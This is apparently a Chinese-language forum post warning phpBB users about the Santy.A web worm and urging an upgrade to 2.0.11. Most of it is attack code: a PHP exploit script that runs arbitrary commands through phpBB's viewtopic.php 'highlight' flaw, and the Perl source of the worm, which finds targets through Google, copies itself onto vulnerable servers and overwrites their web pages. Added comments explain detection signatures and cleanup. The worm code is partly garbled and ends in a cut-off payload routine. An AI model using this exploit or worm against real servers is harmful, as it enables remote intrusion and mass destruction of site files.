phpbb论坛用户请立刻升级为最高版本[警告]

網站型病毒 Santy.A 利用 phpBB 弱點進行感染,phpBB 用戶需儘速更新程式
------------------------------------------------

phpBB 為廣受使用的網站論壇程式,由於 phpBB 論壇程式中的 viewtopic.php 存在安全弱點,自 11 月份公佈弱點後,駭客便開始利用弱點進行攻擊,置換網站頁面及竊取資料。在 2004/12/22 發現,駭客更進一步的將此弱點寫成 Santy.A 病毒。

安全弱點是發生在 viewtopic.php 中,由於 urldecode() 函式在處理 "highlight" 參數時未充分過濾使用者提供的資料內容,而可以讓遠端攻擊者在安裝 phpBB 的伺服器執行任意程式碼。

受影響的 phpBB 論壇程式為 2.0.11 之前的版本,Santy.A 是透過 Google 搜尋引擎找出安裝 phpBB 的伺服器,然後攻擊這些存在安全弱點的伺服器,當攻擊成功後,Santy.A 會將自己複製到受感染的主機,並且使用以下內容覆蓋 asp, .htm, .jsp, .php, .phtm, .shtm 檔案。

This site is defaced!!!
NeverEverNoSanity WebWorm generation (感染?)


建議安裝 phpBB 論壇程式的用戶儘速更新至 2.0.11 版本。
 
EXPLOIT CODE:
http://packetstormsecurity.nl/0411-exploits/phpbb.php.txt
PHP:
#!/usr/bin/php -q
<?php
/*
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>
# 15th November 2004 : 4:04 a.m
#
# bug found by How Dark ([url]http://www.howdark.com[/url]) (1st October 2004)
#
# Requirement:
#
#    PHP 4.x with curl extension;
#
# ** Selamat Hari Raya **
*/

// Historical 2004 PoC for the phpBB <= 2.0.10 viewtopic.php "highlight" flaw,
// fixed in phpBB 2.0.11 (see the advisory text above). Retained for analysis;
// the value for defenders is the request signature it produces, noted below.
if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

// Positional arguments; $topic and $proxy are only defined when supplied
// (PHP 4 era code, no isset() guards).
if ($argv[2]){
    $url = $argv[1];
    $command = $argv[2];
}
else {
    echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
    echo "\tURL\t URL to phpnBB site (ex: [url]http://127.0.0.1/html[/url])\n";
    echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
    echo "\ttopic_id\t topic id\n";
    echo "\tproxy\t optional proxy url (ex: [url]http://10.10.10.10:8080[/url])\n";
    exit;
}
if ($argv[3])
    $topic = $argv[3];
else
    $topic = 1;

if ($argv[4])
    $proxy = $argv[4];


$cmd = str2chr($command);

// Detection signature: a viewtopic.php request whose query string contains the
// double-URL-encoded sequence "highlight=%2527%252e" followed by "system(" and
// a run of "chr(" calls. Web-server access logs can be searched for exactly this.
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";       
$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
echo $res;

// Encodes every byte of $str as a chr(N) call, joining them with "%252e"
// (the double-encoded "." concatenation operator). Consequence for log
// analysis: the command text itself never appears in clear in the request,
// so searches should key on the "chr(" runs and the encoded highlight prefix
// rather than on command names.
function str2chr($str){

    for($i = 0;$i < strlen($str);$i++){
        $chr .= "chr(".ord($str{$i}).")";
        if ($i != strlen($str) -1)
             $chr .= "%252e";    
    }
    return $chr;
}
?>
 
PHP:
Santy.A - phpBB <= 2.0.10 Web Worm Source Code (PoC)
#
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept)
#                          ~~ For educational purpose ~~ 
#
# See : [url]http://isc.sans.org/diary.php?date=2004-12-21[/url]
#          [url]http://www.k-otik.com/news/20041221.phpbbworm.php[/url]
#          [url]http://www.f-secure.com/v-descs/santy_a.shtml[/url]
#
#!/usr/bin/perl
# Santy.A worm body (2004), reproduced here for analysis; see the advisory
# text above for the affected versions and the fixed release.
use 
strict;
use Socket;


# Forward declarations. The ($) prototypes only affect how calls are parsed;
# they perform no argument validation.
sub PayLoad();
sub DoDir($);
sub DoFile ($);
sub GoGoogle();

sub GrabURL($);
sub str2chr($);

# Detach from the launching process: the child continues, the parent exits,
# and a failed fork is silently ignored.
eval{ fork and exit; };

# Generation counter. The worm rewrites this literal in its own source (the
# s///e below) before sending a copy onward, and the defacement payload only
# runs once the value exceeds 3.
my $generation = x;
PayLoad() if $generation > 3;

# Reads its own source into memory and deletes the on-disk copy. For incident
# responders: the running process may then hold the only copy, so capture the
# process image before terminating it.
open IN, $0 or exit;
my $self = join '', <IN>;
close IN;
unlink $0;

# Reachability probe against Google; without it the worm either runs the
# payload (generation > 3) or exits.
while(!GrabURL('http://www.google.com/advanced_search')) {
if($generation > 3) 
{
PayLoad() ;
} else {
exit;
}
}

# Bumps the generation literal in the in-memory copy that will be propagated.
$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e;

# Indicators of compromise visible here: the dropped file name 'm1ho2of' and
# the marker string 'HYv9po4z3jjHWanN' that a vulnerable target echoes back.
my $selfFileName = 'm1ho2of';
my $markStr = 'HYv9po4z3jjHWanN';
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"';
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527';

# Main propagation loop. Kill switch: a file named 'stop.it' in the working
# directory stops it at the next check.
while(1) {
exit if -e 'stop.it';

# For each search hit: strip any existing highlight parameter, send the probe,
# and continue only with hosts whose response contains the marker string.
OUTER: for my $url (GoGoogle()) {

exit if -e 'stop.it';

$url =~ s/&highlight=.*$//;
$url .= $tryCode;
my $r = GrabURL($url);
next unless defined $r;
next unless $r =~ /$markStr/;

# Transfers $self 20 bytes per request. Each chunk is a separate HTTP request,
# so an infection attempt shows up in access logs as a burst of viewtopic.php
# requests from one source carrying "fwrite(fopen(" in the query string.
while($self =~ /(.{1,20})/gs) {
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '),
' . str2chr($1) . '),exit%252e%2527';

$url =~ s/&highlight=.*$//;
$url .= $portion;

next OUTER unless GrabURL($url);
}

# Final request triggers execution of the dropped file on the target.
my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527'; 
$url =~ s/&highlight=.*$//;
$url .= $syst;

GrabURL($url);
}
}



# Rewrites $s as a sequence of chr() calls joined by the double-encoded dot
# "%252e", with the trailing separator removed; this is what keeps literal
# command text out of every request the worm sends.
sub str2chr($) {
my $s = shift;

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg;
$s =~ s/%252e$//;

return $s;
}


# Harvests candidate viewtopic.php URLs from a Google allinurl: query for a
# random topic id (using one of the parameters t, p or topic), then follows
# the result-page pagination links. Propagation depends entirely on this
# third-party search index, so blocking server-side outbound HTTP to search
# engines is a practical containment for this class of worm.
sub GoGoogle() {
my @urls;
my @ts = qw/t p topic/;
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '&
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . 
'%22&btnG=Search';
my $goo1st = GrabURL($startURL)
fined $goo1st;
my $allGoo = $goo1st;
# Pattern for the "next page" links in the result HTML.
my $r = '><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26 
alt="" border=0>
\d+</a>';
while($goo1st =~ m#$r#g) {
$allGoo . = GrabURL('www.google.com' . $1);
}
while($allGoo =~ m#href=([url]http://\S+viewtopic.php\S+[/url])#g) {
my $u = $1;
# Drop hits that embed a second http:// (redirect-style result links).
next if $u =~ m#[url]http://.*http://#i;[/url] # no redirects
push(@urls, $u);
}

return @urls;
}


# Minimal HTTP/1.0 GET over a raw TCP socket: no TLS, no redirects, no status
# check. Returns the whole response (headers included) or nothing on any
# failure. The fixed header set below — User-Agent "Mozilla/4.0 (compatible;
# MSIE 6.0; Windows NT 5.1)", "Pragma: no-cache", "Cache-Control: no-cache"
# and a Referer built from the target host and path — is a usable log
# signature when seen together with the encoded highlight parameter.
sub GrabURL($) {
my $url = shift;
$url =~ s#^[url]http://##i;[/url]

# Split into host[:port] and path; give up if there is no path component.
my ($host, $res) = $url =~ m#^(.+?)(/.*)#;
return unless defined($host) && defined($res);

my $r = 
"GET $resHTTP/1.0\015\012" . 
"Host: $host\015\012" . 
"Accept:*/*\015\012" . 
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" .
"Pragma: no-cache\015\012" .
"Cache-Control: no-cache\015\012" .
"Referer: [url]http://[/url]" . $host . $res . "\015\012" .

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" .
"Connection: close\015\012\015\012";

# Optional :port suffix on the host part; default 80.
my $port = 80;
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;}

my $internet_addr = inet_aton($host) or return;
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return;
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000);

connect(Server, sockaddr_in($port, $internet_addr)) or return;
# Unbuffered write of the request, then read the full response.
select((select(Server), $| = 1)[0]);
print Server $r;

my $answer = join '', <Server>; 
close (Server);

return $answer;
}


# Defacement routine. Overwrites the file named in $_[0] with a fixed HTML page
# ("This site is defaced!!!" in TITLE and H1, and "NeverEverNoSanity WebWorm
# generation N" in the ADDRESS line) — the same strings quoted in the advisory
# above. For cleanup: the file is unlinked and recreated, so the original
# content is gone and must be restored from backup; the fixed strings make
# affected files easy to locate with a content search.
sub DoFile($) {
my $s = q{
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD>
 bgcolor="#000000" text="#FF0000">
<H1>This site is defaced!!!</H1>
<HR><ADDRESS>[b]NeverEverNoSanity WebWorm generation } 
. $generation .q{.[/b]</ADDRESS>
>>
};

unlink $_[0];
open OUT, ">$_[0]" or return;
print OUT $s;
close OUT;
}


# Recursive directory walk starting at $_[0]. Symlinks are skipped (the -d test
# reuses the stat buffer from -l via "_"), subdirectories are recursed into,
# and any entry whose name contains .htm/.php/.asp/.shtm/.jsp/.phtm is passed
# to DoFile. The patterns are unanchored and case-insensitive, so names such
# as "index.php.bak" also match — worth remembering when scoping cleanup of a
# hit under the starting directory.
sub DoDir($) {

my $dir = $_[0];
$dir .= '/' unless $dir =~ m#/$#;

local *DIR;
opendir DIR, $dir or return;

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) {

unless(-l $dir . $ent) {
if(-d _) {
DoDir($dir . $ent);
next;
}
}

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i 
or $ent =~ /\.phtm/i) {
DoFile($dir . $ent);
}
}

closedir DIR;
}


sub Pay Load() {

my @dirs;


eval{
while(my @a = getpwent()) { push(@dirs, $a[7]);}
};

push(@dirs, '/ ');

for my $l ('A' .. 'Z') {
push(@d 
for my $d (@dirs) {
DoDir($d); 
}
}
 
.......................
 